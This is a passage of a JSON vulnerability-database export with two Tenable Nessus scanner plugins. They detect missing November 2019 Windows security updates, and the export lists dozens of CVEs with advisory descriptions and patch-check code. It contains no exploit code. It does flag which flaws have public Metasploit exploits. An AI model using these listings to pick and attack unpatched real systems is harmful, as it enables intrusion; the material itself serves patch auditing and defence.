"bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525239\nor cumulative update 4525234. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719) \n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1441)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1391)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4525234.NASL", "href": "https://www.tenable.com/plugins/nessus/130904", "published": "2019-11-12T00:00:00", "title": "KB4525239: Windows Server 2008 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130904);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/12/30\");\n\n script_cve_id(\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-1384\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1412\",\n \"CVE-2019-1415\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1424\",\n \"CVE-2019-1429\",\n \"CVE-2019-1432\",\n \"CVE-2019-1433\",\n \"CVE-2019-1434\",\n \"CVE-2019-1435\",\n \"CVE-2019-1439\",\n \"CVE-2019-1441\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525234\");\n script_xref(name:\"MSKB\", value:\"4525239\");\n script_xref(name:\"MSFT\", value:\"MS19-4525234\");\n script_xref(name:\"MSFT\", value:\"MS19-4525239\");\n\n script_name(english:\"KB4525239: Windows Server 2008 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525239\nor cumulative update 4525234. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719) \n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411, CVE-2019-1432)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1434)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists in\n Windows Adobe Type Manager Font Driver (ATMFD.dll) when\n it fails to properly handle objects in memory. An\n attacker who successfully exploited this vulnerability\n could potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2019-1412)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1441)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1391)\");\n # https://support.microsoft.com/en-us/help/4525234/windows-server-2008-update-kb4525234\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f741cc55\");\n # https://support.microsoft.com/en-us/help/4525239/windows-server-2008-update-kb4525239\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be8de061\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4525239 or Cumulative Update KB4525234.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1441\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4525234', '4525239');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4525234, 4525239])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-01T04:58:11", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4525236. \nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when \n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1407, CVE-2019-1433, CVE-2019-1435,\n CVE-2019-1438)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1383, CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)", "modified": "2020-08-02T00:00:00", "id": "SMB_NT_MS19_NOV_4525236.NASL", "href": "https://www.tenable.com/plugins/nessus/130906", "published": "2019-11-12T00:00:00", "title": "KB4525236: Windows 10 Version 1607 and Windows Server 2016 November 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130906);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2020/02/14\");\n\n script_cve_id(\n \"CVE-2018-12207\",\n \"CVE-2019-0712\",\n \"CVE-2019-0719\",\n \"CVE-2019-1374\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1383\",\n \"CVE-2019-1384\",\n \"CVE-2019-1388\",\n \"CVE-2019-1389\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1407\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1413\",\n \"CVE-2019-1415\",\n \"CVE-2019-1417\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1420\",\n \"CVE-2019-1422\",\n \"CVE-2019-1424\",\n \"CVE-2019-1426\",\n \"CVE-2019-1427\",\n \"CVE-2019-1428\",\n \"CVE-2019-1429\",\n \"CVE-2019-1433\",\n \"CVE-2019-1435\",\n \"CVE-2019-1436\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4525236\");\n script_xref(name:\"MSFT\", value:\"MS19-4525236\");\n\n script_name(english:\"KB4525236: Windows 10 Version 1607 and Windows Server 2016 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4525236. \nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when \n Windows Hyper-V Network Switch on a host server fails\n to properly validate input from an authenticated user\n on a guest operating system. (CVE-2019-0719)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1389, CVE-2019-1397)\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or 